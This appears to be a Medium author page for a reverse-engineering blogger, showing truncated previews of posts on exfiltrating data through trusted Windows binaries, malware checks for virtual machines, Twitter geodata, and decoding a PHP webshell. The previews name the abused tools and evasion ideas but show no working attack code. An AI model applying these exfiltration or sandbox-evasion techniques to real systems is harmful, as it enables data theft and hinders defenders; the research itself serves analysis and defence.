Image for post
Image for post

[part 2]

When it comes to data exfiltration, creativity and thinking outside the box is the most important. To remember; The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Greaber to explain the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts. [see more]

This time, I managed to find another unexpected way using WCF Data Service Client Utility (DataSvcUtil.exe), DataSvcUtil.exe is a command-line tool provided by…


Image for post
Image for post

To evade detection and analysis by security researchers, malware may check if it is running under a virtualized environment such as virtual machine in VirtualBox and VMWare. If these checks indicate that it is being run in a VM, the malware will simply not run, and in some cases, delete itself to prevent analysis.

A common approach to analyse potentially malicious software is dynamic analysis. The binary is executed in an analysis environment, usually a Virtual Machine (VM), and its behaviour in the system is inspected.

Many Virtual Machine Environent (VME) are easily detectable:

  • File System
  • Services
  • Hardware Information
  • Registry…


Image for post
Image for post

When working with Tweet data, there are two classes of geographical metadata, you can use the following search to find any media-items tagged with a specific GPS location

  • Tweet location — Available when user shares location at time of Tweet.
  • Account Location — Based on the ‘home’ location provided by user in their public profile. This is a free-form character field and may or may not contain metadata that can be geo-referenced.

Important Notes: Geographical coordinates are provided in the [LONG, LAT] order. The one exception is the deprecated ‘geo’ attribute, which has the reverse [LAT, LONG] order. …


Image for post
Image for post

Fisrt, you need to create a account on DigitalOcean, when you create the account, you will receive 100U$ credits to spend:


Image for post
Image for post

The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Greaber to explain the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts[1].

You can check a lof of tricks on “https://github.com/LOLBAS-Project/LOLBAS” — Living Off The Land Binaries And Scripts — (LOLBins and LOLScripts).

My first discover was a simple way to abuse Microsoft Windows Defender utility [“C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9–0\ConfigSecurityPolicy.exe”] to exfil data:


Image for post
Image for post

Atualizando meu parser para o pastebin, encontrei uma webshell em php bem interessante e resolvi decodar por curiosidade. Para esse tipo de análise sempre recomendo o uso do Cyberchef, basicamente um canivete suiço para coisas como criptografia, encoding, compressão e análise de dados, e essa será a única coisa que você irá necesssitar para reproduzir esse artigo e aplicar em outras ofuscações, encodes e análise de malwares relacionados.

CyberChef https://github.com/gchq/CyberChef


The Win32_TemperatureProbe WMI class represents the properties of a temperature sensor (electronic thermometer).

Image for post
Image for post
command: wmic /namespace:\\root\WMI path MSAcpi_ThermalZoneTemperature get CurrentTemperature

Most of the information that the Win32_TemperatureProbe WMI class provides comes from SMBIOS. Real-time readings for the CurrentReading property cannot be extracted from SMBIOS tables. For this reason, current implementations of WMI do not populate the CurrentReading property. The CurrentReading property’s presence is reserved for future use.

Win32_TemperatureProbe has 35 properties:

rax+rax

reverse engineering and malware tales\\ Linkedin@isdebuggerpresent\\

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store